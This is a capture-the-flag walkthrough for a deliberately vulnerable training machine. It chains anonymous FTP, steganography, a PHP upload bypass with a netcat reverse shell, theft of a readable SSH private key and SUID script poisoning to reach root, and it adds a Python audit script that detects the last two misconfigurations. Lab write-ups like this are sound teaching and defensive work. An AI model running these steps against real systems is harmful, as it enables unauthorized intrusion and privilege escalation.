By ItsMhaa
Welcome to DevCorp — where mistakes are meant to be reset.
In this easy-to-medium difficulty CTF, you step into the shoes of a security researcher investigating a careless developer’s internal staging machine.
What starts with anonymous FTP access slowly unravels into a multi-step chain of steganography, web exploitation, SSH hijacking, and a SUID binary that resets more than just the website 😏
Name: LaZzyCorp: Lazy Reset
Difficulty: Easy-Medium
Creator: ItsMhaa
OS: Ubuntu 20.04
IP: [Dynamic/Static – e.g., 192.168.1.150]
DevCorp is a startup working on a blog platform. Their junior dev, Arvind, has been testing things on a local server — but in classic lazy fashion, he’s left behind:
- Sensitive developer notes
- A hidden image in FTP
- His personal SSH key
- And worst of all… a reset tool that runs as root 🧨
Your goal?
Pivot from anonymous FTP to full root by chaining together misconfigs, forgotten files, and one poorly secured script.
A misconfigured FTP server and a lazy reset tool set the stage for your exploitation path.
Expect a mix of:
- Steganography
- Upload bypasses
- Permission abuse
- A clean privilege escalation path
- Minimal guesswork, maximum fun!
- Run `nmap` → open ports: 21 (FTP), 80 (HTTP), 22 (SSH)
- Try anonymous FTP → Success
- Inside `/pub/`, you find: ✅ `note.jpg` (Note: make sure you use FTP binary mode when downloading the file.)
- Extract hidden data using: `steghide extract -sf note.jpg`
- Hidden creds discovered inside: Username: dev Password: ****
- Visit the site → `/login`
- Upload `shell.php` using extension bypass: `.php.upload`
- Start listener: `nc -lvnp 4444`
- Trigger uploaded shell → gain reverse shell as www-data
- While in shell: `cat /home/arvind/.ssh/id_rsa`
- File is world-readable
- Copy it to your attacker box → Save as `id_rsa` → `chmod 600 id_rsa`
- SSH into: `ssh -i id_rsa arvind@<target-ip>`
- List SUID binaries: `find / -perm -4000 2>/dev/null`
- You find: `/home/arvind/reset`
- It runs: `/usr/bin/reset_site.sh`
- And that file is writable by arvind
- Modify it: `echo 'bash -p' > /usr/bin/reset_site.sh`
- Now run: `/home/arvind/reset`
- BOOM → Root shell
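The last two stages of this chain rest on two file-permission mistakes: a private key that other users can read, and a SUID binary that runs a script a non-root user can modify. The audit below is an added example, not part of the original walkthrough or the box. Its function names, the regex scan for paths embedded in a binary, and the default of trusting only uid 0 are assumptions made for illustration.

```python
import os, re, stat

# Absolute paths embedded as strings in a binary (e.g. the script a wrapper runs).
PATH_RE = re.compile(rb"/[\w.\-]+(?:/[\w.\-]+)+")

def suid_files(root):
    """Yield regular files under root that have the set-user-ID bit."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                yield path

def referenced_paths(binary):
    """Return existing files whose absolute path appears inside the binary."""
    with open(binary, "rb") as fh:
        hits = {m.group().decode("ascii") for m in PATH_RE.finditer(fh.read())}
    return sorted(p for p in hits if os.path.isfile(p))

def untrusted_write(path, trusted_uids=(0,)):
    """True if the file's owner is untrusted or group/other may write to it."""
    st = os.stat(path)
    return st.st_uid not in trusted_uids or bool(st.st_mode & 0o022)

def exposed_private_keys(home_root):
    """Return id_* private keys under */.ssh/ that group or other can access."""
    found = []
    for dirpath, _dirs, names in os.walk(home_root):
        if os.path.basename(dirpath) != ".ssh":
            continue
        for name in names:
            path = os.path.join(dirpath, name)
            if name.startswith("id_") and not name.endswith(".pub") \
                    and os.stat(path).st_mode & 0o077:
                found.append(path)
    return sorted(found)

def audit(root, home_root, trusted_uids=(0,)):
    """Collect (finding, file, related_file) tuples for both misconfigurations."""
    findings = [("suid-runs-writable-file", b, ref)
                for b in suid_files(root) for ref in referenced_paths(b)
                if untrusted_write(ref, trusted_uids)]
    findings += [("private-key-readable", k, None)
                 for k in exposed_private_keys(home_root)]
    return findings
```

Run it as root, for example `audit("/", "/home")`, so that every SUID binary is readable. It checks each file's own owner and mode only, not whether a parent directory is writable.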
/home/arvind/user.txt → FLAG{****}
/root/root.txt → FLAG{*****}
✅ Steganography + FTP
✅ Web login & PHP upload bypass
✅ Reading SSH keys from web shells
✅ SSH pivoting
✅ SUID + script poisoning for root access
This box was made for:
- Beginners learning post-exploitation
- People wanting story-based lateral movement
- CTF lovers who enjoy clean logic over rabbit holes
Made with ❤️ by ItsMhaa
LinkedIn: www.linkedin.com/in/mohammad-husain-ajani
GitHub: https://github.com/mohammadajani/mohammadajani
Notion Walkthrough: LaZzyCorp: Lazy Reset